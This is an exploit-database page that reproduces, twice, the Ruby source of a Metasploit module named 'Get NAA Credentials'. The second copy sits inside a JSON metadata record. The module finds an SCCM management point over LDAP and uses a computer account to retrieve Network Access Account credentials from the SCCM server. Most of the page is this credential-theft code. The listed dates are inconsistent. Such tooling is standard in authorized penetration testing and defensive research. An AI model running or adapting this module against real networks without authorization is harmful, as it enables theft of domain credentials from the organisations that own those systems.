Get NAA Credentials_MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-

Description

This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server. ...

Basic Information

ID MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-

Published Aug 29, 2025 at 18:53

Modified Mar 4, 2025 at 18:55

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include ::Msf::Exploit::Remote::HTTP::SCCM
include Msf::Exploit::Remote::LDAP
include Msf::OptionalSession::LDAP

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Get NAA Credentials',
'Description' => %q{
This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.
This requires a computer account, which can be added using the samr_account module.
},
'Author' => [
'xpn', # Initial research
'skelsec', # Initial obfuscation port
'smashery' # module author
],
'References' => [
['URL', 'https://blog.xpnsec.com/unobfuscating-network-access-accounts/'],
['URL', 'https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md'],
['URL', 'https://github.com/Mayyhem/SharpSCCM'],
['URL', 'https://github.com/garrettfoster13/sccmhunter']
],
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [],
'SideEffects' => [CONFIG_CHANGES],
'Reliability' => []
}
)
)

register_options([
OptAddressRange.new('RHOSTS', [ false, 'The domain controller (for autodiscovery). Not required if providing a management point and site code' ]),
OptPort.new('RPORT', [ false, 'The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code', 389 ]),
OptString.new('COMPUTER_USER', [ true, 'The username of a computer account' ]),
OptString.new('COMPUTER_PASS', [ true, 'The password of the provided computer account' ]),
OptString.new('MANAGEMENT_POINT', [ false, 'The management point (SCCM server) to use' ]),
OptString.new('SITE_CODE', [ false, 'The site code to use on the management point' ]),
OptString.new('DOMAIN', [ true, 'The domain to authenticate to', '' ])
])

deregister_options('LDAPDomain') # deregister LDAPDomain because DOMAIN is registered and used for both LDAP and HTTP

@session_or_rhost_required = false
end

def find_management_point
ldap_connect do |ldap|
validate_bind_success!(ldap)

if (@base_dn = datastore['BASE_DN'])
print_status("User-specified base DN: #{@base_dn}")
else
print_status('Discovering base DN automatically')

if (@base_dn = ldap.base_dn)
print_status("#{ldap.peerinfo} Discovered base DN: #{@base_dn}")
else
fail_with(Msf::Module::Failure::UnexpectedReply, "Couldn't discover base DN!")
end
end
raw_objects = ldap.search(base: @base_dn, filter: '(objectclass=mssmsmanagementpoint)', attributes: ['*'])
return nil unless raw_objects.any?

raw_obj = raw_objects.first

raw_objects.each do |ro|
print_good("Found Management Point: #{ro[:dnshostname].first} (Site code: #{ro[:mssmssitecode].first})")
end

if raw_objects.length > 1
print_warning("Found more than one Management Point. Using the first (#{raw_obj[:dnshostname].first})")
end

obj = {}
obj[:rhost] = raw_obj[:dnshostname].first
obj[:sitecode] = raw_obj[:mssmssitecode].first

obj
rescue Errno::ECONNRESET
fail_with(Msf::Module::Failure::Disconnected, 'The connection was reset.')
rescue Rex::ConnectionError => e
fail_with(Msf::Module::Failure::Unreachable, e.message)
rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
fail_with(Msf::Module::Failure::NoAccess, e.message)
rescue Net::LDAP::Error => e
fail_with(Msf::Module::Failure::Unknown, "#{e.class}: #{e.message}")
end
end

def run
management_point = datastore['MANAGEMENT_POINT']
site_code = datastore['SITE_CODE']
if management_point.blank? != site_code.blank?
fail_with(Failure::BadConfig, 'Provide both MANAGEMENT_POINT and SITE_CODE, or neither (to perform autodiscovery)')
end

if management_point.blank?
begin
result = find_management_point
fail_with(Failure::NotFound, 'Failed to find management point') unless result
management_point = result[:rhost]
site_code = result[:site_code]
rescue ::IOError => e
fail_with(Failure::UnexpectedReply, e.message)
end
end

opts = {
'username' => datastore['COMPUTER_USER'],
'password' => datastore['COMPUTER_PASS']
}
computer_user = datastore['COMPUTER_USER'].delete_suffix('$')
get_naa_credentials(opts, management_point, site_code, computer_user)
end
end

{
    "lastseen": "2025-08-29T19:24:32",
    "description": "This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.        ...",
    "published": "2025-08-29T18:53:23",
    "modified": "2025-03-04T18:55:46",
    "type": "metasploit",
    "title": "Get NAA Credentials",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-ADMIN-SCCM-GET_NAA_CREDENTIALS-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\nclass MetasploitModule < Msf::Auxiliary\n  include ::Msf::Exploit::Remote::HTTP::SCCM\n  include Msf::Exploit::Remote::LDAP\n  include Msf::OptionalSession::LDAP\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Get NAA Credentials',\n        'Description' => %q{\n          This module attempts to retrieve the Network Access Account(s), if configured, from the SCCM server.\n          This requires a computer account, which can be added using the samr_account module.\n        },\n        'Author' => [\n          'xpn',     # Initial research\n          'skelsec', # Initial obfuscation port\n          'smashery' # module author\n        ],\n        'References' => [\n          ['URL', 'https://blog.xpnsec.com/unobfuscating-network-access-accounts/'],\n          ['URL', 'https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md'],\n          ['URL', 'https://github.com/Mayyhem/SharpSCCM'],\n          ['URL', 'https://github.com/garrettfoster13/sccmhunter']\n        ],\n        'License' => MSF_LICENSE,\n        'Notes' => {\n          'Stability' => [],\n          'SideEffects' => [CONFIG_CHANGES],\n          'Reliability' => []\n        }\n      )\n    )\n\n    register_options([\n      OptAddressRange.new('RHOSTS', [ false, 'The domain controller (for autodiscovery). Not required if providing a management point and site code' ]),\n      OptPort.new('RPORT', [ false, 'The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code', 389 ]),\n      OptString.new('COMPUTER_USER', [ true, 'The username of a computer account' ]),\n      OptString.new('COMPUTER_PASS', [ true, 'The password of the provided computer account' ]),\n      OptString.new('MANAGEMENT_POINT', [ false, 'The management point (SCCM server) to use' ]),\n      OptString.new('SITE_CODE', [ false, 'The site code to use on the management point' ]),\n      OptString.new('DOMAIN', [ true, 'The domain to authenticate to', '' ])\n    ])\n\n    deregister_options('LDAPDomain') # deregister LDAPDomain because DOMAIN is registered and used for both LDAP and HTTP\n\n    @session_or_rhost_required = false\n  end\n\n  def find_management_point\n    ldap_connect do |ldap|\n      validate_bind_success!(ldap)\n\n      if (@base_dn = datastore['BASE_DN'])\n        print_status(\"User-specified base DN: #{@base_dn}\")\n      else\n        print_status('Discovering base DN automatically')\n\n        if (@base_dn = ldap.base_dn)\n          print_status(\"#{ldap.peerinfo} Discovered base DN: #{@base_dn}\")\n        else\n          fail_with(Msf::Module::Failure::UnexpectedReply, \"Couldn't discover base DN!\")\n        end\n      end\n      raw_objects = ldap.search(base: @base_dn, filter: '(objectclass=mssmsmanagementpoint)', attributes: ['*'])\n      return nil unless raw_objects.any?\n\n      raw_obj = raw_objects.first\n\n      raw_objects.each do |ro|\n        print_good(\"Found Management Point: #{ro[:dnshostname].first} (Site code: #{ro[:mssmssitecode].first})\")\n      end\n\n      if raw_objects.length > 1\n        print_warning(\"Found more than one Management Point. Using the first (#{raw_obj[:dnshostname].first})\")\n      end\n\n      obj = {}\n      obj[:rhost] = raw_obj[:dnshostname].first\n      obj[:sitecode] = raw_obj[:mssmssitecode].first\n\n      obj\n    rescue Errno::ECONNRESET\n      fail_with(Msf::Module::Failure::Disconnected, 'The connection was reset.')\n    rescue Rex::ConnectionError => e\n      fail_with(Msf::Module::Failure::Unreachable, e.message)\n    rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e\n      fail_with(Msf::Module::Failure::NoAccess, e.message)\n    rescue Net::LDAP::Error => e\n      fail_with(Msf::Module::Failure::Unknown, \"#{e.class}: #{e.message}\")\n    end\n  end\n\n  def run\n    management_point = datastore['MANAGEMENT_POINT']\n    site_code = datastore['SITE_CODE']\n    if management_point.blank? != site_code.blank?\n      fail_with(Failure::BadConfig, 'Provide both MANAGEMENT_POINT and SITE_CODE, or neither (to perform autodiscovery)')\n    end\n\n    if management_point.blank?\n      begin\n        result = find_management_point\n        fail_with(Failure::NotFound, 'Failed to find management point') unless result\n        management_point = result[:rhost]\n        site_code = result[:site_code]\n      rescue ::IOError => e\n        fail_with(Failure::UnexpectedReply, e.message)\n      end\n    end\n\n    opts = {\n      'username' => datastore['COMPUTER_USER'],\n      'password' => datastore['COMPUTER_PASS']\n    }\n    computer_user = datastore['COMPUTER_USER'].delete_suffix('$')\n    get_naa_credentials(opts, management_point, site_code, computer_user)\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sccm/get_naa_credentials.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/admin/sccm/get_naa_credentials/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply